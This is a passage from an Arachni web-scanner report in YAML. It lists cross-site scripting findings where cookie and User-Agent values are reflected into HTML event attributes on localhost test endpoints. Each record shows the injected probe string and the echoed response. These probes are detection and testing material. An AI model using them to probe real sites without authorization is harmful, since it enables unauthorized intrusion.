        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover%3Barachni_xss_in_element_event%3D71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "469"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onmouseover="default-onmouseover;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseover</a>
    injected: default-onmouseover;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: onmouseover
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        onmouseover: default-onmouseover;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: default-onmouseover;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        onmouseover: default-onmouseover;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/cookie/onmouseover
      :id: <a href="/" onmouseover="default-onmouseover;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseover</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onmouseover=default-onmouseover;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onmouseover</a><a href='/' onmouseover="default-onmouseover;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseover</a><a href='/' onmouseover='default-onmouseover;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onmouseover</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/cookie/onmouseover
    var: onmouseover
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: cookie
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/cookie/onmouseup
  var: onmouseup
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup%3Barachni_xss_in_element_event%3D71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "451"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onmouseup="default-onmouseup;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseup</a>
    injected: default-onmouseup;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: onmouseup
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        onmouseup: default-onmouseup;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: default-onmouseup;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        onmouseup: default-onmouseup;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/cookie/onmouseup
      :id: <a href="/" onmouseup="default-onmouseup;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseup</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onmouseup=default-onmouseup;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onmouseup</a><a href='/' onmouseup="default-onmouseup;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseup</a><a href='/' onmouseup='default-onmouseup;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onmouseup</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/cookie/onmouseup
    var: onmouseup
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: cookie
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/cookie/src
  var: src
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src%3Barachni_xss_in_element_event%3D71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "397"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" src="default-src;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">src</a>
    injected: default-src;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: src
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        src: default-src;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: default-src;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        src: default-src;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/cookie/src
      :id: <a href="/" src="default-src;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">src</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' src=default-src;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>src</a><a href='/' src="default-src;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">src</a><a href='/' src='default-src;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>src</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/cookie/src
    var: src
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: header
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/header/onload
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "418"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onload="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onload</a>
    injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/header/onload
      :id: <a href="/" onload="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onload</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onload=arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onload</a><a href='/' onload="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onload</a><a href='/' onload='arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onload</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/header/onload
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: header
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/header/onunload
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "430"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onunload="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onunload</a>
    injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/header/onunload
      :id: <a href="/" onunload="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onunload</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onunload=arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onunload</a><a href='/' onunload="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onunload</a><a href='/' onunload='arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onunload</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/header/onunload
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: header
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/header/onblur
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "418"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onblur="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onblur</a>
    injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/header/onblur
      :id: <a href="/" onblur="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onblur</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onblur=arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onblur</a><a href='/' onblur="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onblur</a><a href='/' onblur='arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onblur</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/header/onblur
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: header
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/header/onchange
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "430"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onchange="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onchange</a>
    injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/header/onchange
      :id: <a href="/" onchange="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onchange</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onchange=arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onchange</a><a href='/' onchange="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onchange</a><a href='/' onchange='arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onchange</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/header/onchange
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: header
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
